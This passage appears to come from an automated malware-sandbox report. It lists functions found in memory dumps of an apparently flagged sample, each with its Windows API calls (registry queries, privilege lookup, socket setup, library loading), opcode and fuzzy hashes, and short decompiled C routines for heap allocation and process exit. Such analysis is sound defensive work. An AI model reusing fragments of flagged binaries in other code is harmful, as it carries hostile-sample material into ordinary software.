LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A7ADE6

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 38bb8bfe7b53bcbecc774a989fc695d0b9f5f7d5fab40c583397c74f5ad97ee7
Instruction ID: 32637a749bbc4a786c461d1d9507d69e1675756f64e0031b41e6d9c305d9c2e2
Opcode Fuzzy Hash: 38bb8bfe7b53bcbecc774a989fc695d0b9f5f7d5fab40c583397c74f5ad97ee7
Instruction Fuzzy Hash: 562195B25093805FD7128F65DC45B96BFE4EF52310F09C4DBD989CB2A3D264D908C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AA8E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7AB08

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0fc1e173663a41a0efd8d2d7b34200b6647d90b3db9cce51b8c1e1639b9a901c
Instruction ID: d561bef4783e8c687390a50e14e48a1dda4357b98671f8b42648c2ae5ef437b0
Opcode Fuzzy Hash: 0fc1e173663a41a0efd8d2d7b34200b6647d90b3db9cce51b8c1e1639b9a901c
Instruction Fuzzy Hash: 7E218C71600604AEE720CF15CC85F6BFBECEF94710F14C46AEA499B251D664E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B050, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A7B0BC

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e2d196d779fe52e96e66fcb56d52565199a701ae8c3c58188f1663ae8726189f
Instruction ID: df191ca2ae9d7ee5601d7b36976c47bebd0f1a2e8d28561ca42b5535e922d683
Opcode Fuzzy Hash: e2d196d779fe52e96e66fcb56d52565199a701ae8c3c58188f1663ae8726189f
Instruction Fuzzy Hash: 6F21A1B25093C05FDB028B25DC55B92BFA4AF43324F0984DAED858F663D2759908C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B606, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7B66A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 0e00c518424d4b703257141b3cbbceaa554b6498aa2e0f4d0546044721cf56df
Instruction ID: 6b6ce22306954e8559d65b1518638bfbb9b226984bd9684d620936c0837fbeca
Opcode Fuzzy Hash: 0e00c518424d4b703257141b3cbbceaa554b6498aa2e0f4d0546044721cf56df
Instruction Fuzzy Hash: D3116DB1500604AFEB21CF15DC85F6BBBA8EF45710F14C46AEA49DB251D774E9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 00A7ACB7, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A7AD24

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: da59ee421cee217bc5b6e01d166b93e260b78efffb0ba6b99c60db4b1b6f5e57
Instruction ID: 366584cdf1f52fd095338ba85fa30af5cec2d991bc5361a028e9c55b3facfebe
Opcode Fuzzy Hash: da59ee421cee217bc5b6e01d166b93e260b78efffb0ba6b99c60db4b1b6f5e57
Instruction Fuzzy Hash: 7521AEB540A3C0AFEB128B25DC51792BFA4EF43220F09C4DBED888F563D2659948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AB77, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 00A7ABFA

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 7a45a290fe089c3ea79566b1eab61061b5376ded0c4766633b2f22203957ad62
Instruction ID: 685446f4d839fdd4f4c02dfec53b18ea2e0f7604bf3e7f5fc74a4c6c9810fef9
Opcode Fuzzy Hash: 7a45a290fe089c3ea79566b1eab61061b5376ded0c4766633b2f22203957ad62
Instruction Fuzzy Hash: C411B7715453806FD3128B25DC41F72BFB8EFC6710F0981DAED848B652D221B915C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7BC4A, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E80), ref: 00A7BCD3

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c0919be93bb117b4f1fd9e3af6b39af5728e7ce510c1a8d14f5368a71898655
Instruction ID: ab4a53266d2faab1cb3988d3b64cb5026ac6707edb29d97dfa36b34dd9a62e6f
Opcode Fuzzy Hash: 9c0919be93bb117b4f1fd9e3af6b39af5728e7ce510c1a8d14f5368a71898655
Instruction Fuzzy Hash: 6911E471104344AFE7218B15DC85F66FFA8DF42720F14C49AEE489B292D2A4A948C761

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B51E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7B57A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 574df05ff978086187b3fb218c314a366a4e8a8e0583d934f3f29a2d19299838
Instruction ID: 2f893c43ed5e778637690d884c320a0e2b21d6b4aeb0c8e4271e21c6e295028d
Opcode Fuzzy Hash: 574df05ff978086187b3fb218c314a366a4e8a8e0583d934f3f29a2d19299838
Instruction Fuzzy Hash: 0011B2B1500200AFEB21CF55DC85B6BFBA8EF45720F14C56BEE49DB241D674A8088B71

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A86A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A7A8DC

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1412e0f9c93f6cdbe45b3ef26ee68405de36a1265894a171ddb911eba4db5861
Instruction ID: 9db7c46b96ad1f7b886216c07bd3c55220308f264ba279fe728223204363bdfa
Opcode Fuzzy Hash: 1412e0f9c93f6cdbe45b3ef26ee68405de36a1265894a171ddb911eba4db5861
Instruction Fuzzy Hash: A7218C7140D3C46FD7138B258C54652BFB4DF53620F0980DBDD848F1A3D2A95908D772

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A7BF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7A82A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9bd8037300e0aff8be3d0cf7b05fe1270cb5d308ed60ca7706eeeb9e1b575f0c
Instruction ID: 7e895f909d9580cff4cf1c0f53fdbe8344ee411e4a6a5de465398949d60d0c03
Opcode Fuzzy Hash: 9bd8037300e0aff8be3d0cf7b05fe1270cb5d308ed60ca7706eeeb9e1b575f0c
Instruction Fuzzy Hash: 5511B471409380AFDB228F51DC44A62FFF4EF46310F08C4DAEE898B162D275A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7BC6A, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E80), ref: 00A7BCD3

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6cd85de29b8fd5d68c3c402340edee4c7e8525a0e7d7e0eb3b3685727dace5f2
Instruction ID: 83fa1bdc5982995e64b68f6bfcca35bc4b2ca49097e49c419b95cf017b77b5e9
Opcode Fuzzy Hash: 6cd85de29b8fd5d68c3c402340edee4c7e8525a0e7d7e0eb3b3685727dace5f2
Instruction Fuzzy Hash: FF11E5B1500704AFE7219B15DC41F66FBA8DF05720F24C49AEE485A281D6B5A5088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A3DB, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00A7A43C

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: cb7c3fffd791b9e12175d0d516164fb34af17a5a2df84a2a374ab750080787e1
Instruction ID: 98847498f5ca0b8ca6a402c3acec3499798daf35a53f1b7acf68920a6201c3b7
Opcode Fuzzy Hash: cb7c3fffd791b9e12175d0d516164fb34af17a5a2df84a2a374ab750080787e1
Instruction Fuzzy Hash: 2B119071449384AFD7128F15DC44B56BFB4EF42210F0884DBED488F253D279A808C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AD9E, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00A7ADE6

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bc511274620807aeff3f2d0d15ea264ea91391aa8cbc43db7323b8d4aae6ce20
Instruction ID: e08d0c7b039050676ccb6e1b508d6a572a2916f72132e113af0b9ce4494450d7
Opcode Fuzzy Hash: bc511274620807aeff3f2d0d15ea264ea91391aa8cbc43db7323b8d4aae6ce20
Instruction Fuzzy Hash: 8D118EB2600600AFDB20CF29DC8575AFBE8EF54321F18C4AADD09CB642D674E804CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B726, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 00A7B776

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 0cf4c18dc360d0bef7cfe3b384f7cdf56cdca7fa250fd23d76f90b426f44ef08
Instruction ID: 06b0964fb6c5e1e1061c8f0d362a2669f4a1c8627fdb6f5d8a4f99384b41b66b
Opcode Fuzzy Hash: 0cf4c18dc360d0bef7cfe3b384f7cdf56cdca7fa250fd23d76f90b426f44ef08
Instruction Fuzzy Hash: 90019EB2500200ABD210DF16DC82F26FBA8EB84A20F14856AED088B641E235F915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A4D2, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E80,?,?), ref: 00A7A522

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b8b295bc835f843ec5e7c9e2005f12d74643f3d643a9baa9b49c6bdb3c3800f7
Instruction ID: 271512ec0e6894907c7bf8b4171ab6e4875f1922914733b292a2782b7241a7f6
Opcode Fuzzy Hash: b8b295bc835f843ec5e7c9e2005f12d74643f3d643a9baa9b49c6bdb3c3800f7
Instruction Fuzzy Hash: F801B1B1500300ABD710DF16DC82B26FBA8FB84A20F14856AED088B741E335F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A7E6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7A82A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 00050bbbd4dd9bf1d7e18265d0085e25716c29c7268134249b94e7051d6584d9
Instruction ID: ac0558200226bd5a9d17aa3a4cf5dc05ec1c3f51bf2d844f4923c91abe4a295a
Opcode Fuzzy Hash: 00050bbbd4dd9bf1d7e18265d0085e25716c29c7268134249b94e7051d6584d9
Instruction Fuzzy Hash: AD016D71800700EFDB218F55DC84B56FFE0EF58720F18C9AAEE494A652D276E419DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7ABAA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 00A7ABFA

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: dc7cfb46f5c506891b52e700561396d4b2a46376093f422e29ed63600a1f3b0b
Instruction ID: c02a15c10158f7d21fc3e96446567b53588e2f83e103824f27e66dd6246e5300
Opcode Fuzzy Hash: dc7cfb46f5c506891b52e700561396d4b2a46376093f422e29ed63600a1f3b0b
Instruction Fuzzy Hash: AB01A272500700ABD250DF16DC82F26FBA4FB88B20F14815AED084B741E375F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B38A, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00A7B3DA

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2f1edf60ad98a8aa6998d818b42b37973a0d6754ef5de63583082ede6ce31661
Instruction ID: 4fccadc1eea8c29e6d05487c0e0bdfaf4e373481a24571e817f5b976fcf4d193
Opcode Fuzzy Hash: 2f1edf60ad98a8aa6998d818b42b37973a0d6754ef5de63583082ede6ce31661
Instruction Fuzzy Hash: 8F01A272500700ABD210DF16DC82F26FBA4FB88B20F14815AED084B741E375F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B08A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A7B0BC

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e04946fcce60f9511347d1901f7c59a70d3095266c7d3993e678735b4f6af2b3
Instruction ID: b0a6bb1e21fca9c8e6487cb2c152e3b9b69e86cdf40304ead43643e93e772361
Opcode Fuzzy Hash: e04946fcce60f9511347d1901f7c59a70d3095266c7d3993e678735b4f6af2b3
Instruction Fuzzy Hash: D501B8B16002409FDB10CF2AEC89756FFA4EF40320F18C4AADD098B646D6B5E808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A7ACF2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A7AD24

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 119867d660526177d630b9d675c7e9b21ab19c17cad8bcba78062eb097111024
Instruction ID: 281818f357b79809c03b6cef8360e33fbf74ad33ef069bc338c3154e1c574909
Opcode Fuzzy Hash: 119867d660526177d630b9d675c7e9b21ab19c17cad8bcba78062eb097111024
Instruction Fuzzy Hash: 8001BC71500200AFDB208F29D88476AFFA4EF40321F18C4AADD4D8B652D6B9A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A40A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00A7A43C

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: fbbd5c9d0646ce295e5ab944aac79f8152f638a49c20ff1b66217ea2d176ffbe
Instruction ID: eef47e28774ea932bda0d58ef8f212012df18dcc69640dff22c947e1a65c02a9
Opcode Fuzzy Hash: fbbd5c9d0646ce295e5ab944aac79f8152f638a49c20ff1b66217ea2d176ffbe
Instruction Fuzzy Hash: 7201A270400240AFDB10CF15D88875AFFA4EF50720F18C4AADD4C8F206D6BAA408DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A8AA, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A7A8DC

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e4397d737bc27f565d4a54affd04fbe6e1ef954d7ced9f94282a8302816a24cd
Instruction ID: 947fca3cb361083ef794b20e1392060131cce970f46c7e403019285edbde5741
Opcode Fuzzy Hash: e4397d737bc27f565d4a54affd04fbe6e1ef954d7ced9f94282a8302816a24cd
Instruction Fuzzy Hash: D2F0D130500644EFD7108F05D884726FFA0EF54320F18C09ACE084B206D2B9A408DA63

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00E434C8, Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

:@:r, xrefs: 00E435A9

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID: :@:r
API String ID: 0-1441432688
Opcode ID: 688b6a6ce725cd37358326de545b098396795fc9eeda184742dcedff8f00fed8
Instruction ID: a5edc1ece25eddb6ca69423969dbf5907d4edef3d3eb4a29a26ae4d3b415fdc4
Opcode Fuzzy Hash: 688b6a6ce725cd37358326de545b098396795fc9eeda184742dcedff8f00fed8
Instruction Fuzzy Hash: 3A71D974B000115BEF24ABBCD444B6E7DDAEF9C318F50543AE10AE7391DE69CE818B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E437E0, Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad73685a409ec7b26d6a83d5d5e65f93f5b413d5f6a7ec41d3b7cdbb8b62b2c
Instruction ID: 546c65b4929005d71fc4dc94b1e7394851124f69bd9f435982c5233c80f6cd8e
Opcode Fuzzy Hash: fad73685a409ec7b26d6a83d5d5e65f93f5b413d5f6a7ec41d3b7cdbb8b62b2c
Instruction Fuzzy Hash: AD915470B083858FD715A7B9A4247B97BE29F8A308F1584BAD585FF3D2EA21CC06C751

Uniqueness

Uniqueness Score: -1.00%

Function 00E43B60, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01835a5154ec2fbe25dd1a8c858dbe1900d22a8a09bf626b4cd40a85960f3526
Instruction ID: ba2d395a679238117042fd3f05d0b031046770b3ee496ad31f329510000cf0f0
Opcode Fuzzy Hash: 01835a5154ec2fbe25dd1a8c858dbe1900d22a8a09bf626b4cd40a85960f3526
Instruction Fuzzy Hash: C8A1EF35B042489FCB04EBB8D8546AE7BB6AFC9300F14846AE406EB3A5DF35DD46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E43090, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebfa38c437c88771cff974390af35c6bdfdc9e234559455cd4e8c2e5e7f460c
Instruction ID: 6f9d09feb1fea7d4a3b544af2dd68f577db271993633588e9c05697fcbc91771
Opcode Fuzzy Hash: 2ebfa38c437c88771cff974390af35c6bdfdc9e234559455cd4e8c2e5e7f460c
Instruction Fuzzy Hash: E931C834B043448FC701EB7D98145AE7BF29F89300B1481ABD149EB352EA399D02CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E430F0, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575d0dfdfaea6d198cd33c8a8f1446572c4b451290344764277fa51cba24c507
Instruction ID: 563d5b7d539d5be9b6ef9cc3098baa662fd6c24f32ec00fa5081ca9ebb59f2db
Opcode Fuzzy Hash: 575d0dfdfaea6d198cd33c8a8f1446572c4b451290344764277fa51cba24c507
Instruction Fuzzy Hash: 0811FA79F001148F8B40EBBDD94459EBBF6AB8C750B20816AD509E7345EB359E028B95

Uniqueness

Uniqueness Score: -1.00%

Function 00E42FD0, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe3ae0ad9da7f77c879d57f59b2adc448d742a4d92bfb4bcd76b2747b641e60
Instruction ID: fc00250fd0e7b256c54c7dce93c982ac88e4ef1efc5eee462f15b412b11226bd
Opcode Fuzzy Hash: bfe3ae0ad9da7f77c879d57f59b2adc448d742a4d92bfb4bcd76b2747b641e60
Instruction Fuzzy Hash: 25110C39F001548F8B40EFBDD85469EBBF6AB8C750B20817AD509E7345EA359E02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00E43AAE, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cfa7ab1f5c5ebc27dd5bd01a6ab4bcbf6fa5c33a380026208a578f3aaebe46e
Instruction ID: 16863b9e2fe0dcb36f1a1d3fc96f6c50e7d381668a4270d8a0cab1caa4ffe87a
Opcode Fuzzy Hash: 4cfa7ab1f5c5ebc27dd5bd01a6ab4bcbf6fa5c33a380026208a578f3aaebe46e
Instruction Fuzzy Hash: 70F0F036F005248BCB00BFB9F5552ACFBF2EB88614F104969D89AA7345DF314E268382

Uniqueness

Uniqueness Score: -1.00%

Function 00E4302F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6332f7edea1907874058d62ba6c211ca37a43790e7664fa3761b5d3b0eab91
Instruction ID: 62594bb7a97c09697db4ff419211fbaebce0156d8eb67a1e05d5dbcaa788f8b9
Opcode Fuzzy Hash: 2a6332f7edea1907874058d62ba6c211ca37a43790e7664fa3761b5d3b0eab91
Instruction Fuzzy Hash: 0EE06539F000148F8B00EBFCE4844DDB3F6AF8822472089B6D149E7200EE32AE028B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E4314F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583736605.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2011f2424e15112c30b370789ba6811d0e4c9cb3fbaeaf1c575713aa974f7709
Instruction ID: 610096e61774a8c20e9f111a1762999ca5ab38cfe03e9001acb5997837e233a3
Opcode Fuzzy Hash: 2011f2424e15112c30b370789ba6811d0e4c9cb3fbaeaf1c575713aa974f7709
Instruction Fuzzy Hash: ACE0E539F004148F8B00EBFCE9944DDB3F6AF8862572089B6D549E7354EF35AE029B52

Uniqueness

Uniqueness Score: -1.00%

Function 00A723F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583328120.0000000000A72000.00000040.00000001.sdmp, Offset: 00A72000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb0e10d9efb5637c37b748777d3d5866b7db3a0c73c5ca439339f53018e2f98
Instruction ID: f7192d2e2f31cd77cb00886f7c944acbe75cc7218e81c99078246d98c2d17e38
Opcode Fuzzy Hash: ddb0e10d9efb5637c37b748777d3d5866b7db3a0c73c5ca439339f53018e2f98
Instruction Fuzzy Hash: B0D05E79244A818FD3268B1CC5A4B953BD4EB51B04F46C4FDE8048B6A3C768DD81D300

Uniqueness

Uniqueness Score: -1.00%

Function 00A723BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583328120.0000000000A72000.00000040.00000001.sdmp, Offset: 00A72000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ec3c78a3ed15c7a86683a3f5ca78caa6ceb50e8a241eac1956d8d5baaa916d
Instruction ID: 1d5cf57ac992a8f3f3f346ed166c6e5928e31472adba18034af02fa26281b3e4
Opcode Fuzzy Hash: 04ec3c78a3ed15c7a86683a3f5ca78caa6ceb50e8a241eac1956d8d5baaa916d
Instruction Fuzzy Hash: E2D05E342005818BD715DB0CCA94F5937D4AB41B00F06C4ECAC048F662C7B8DC81C700

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004035F1, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F1(int _a4) {
				void* _t14;

				if(E00405A93(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00403632(_t14, _a4);
				ExitProcess(_a4);
			}

0x004035fd
0x00403619
0x00403619
0x00403622
0x0040362b

APIs

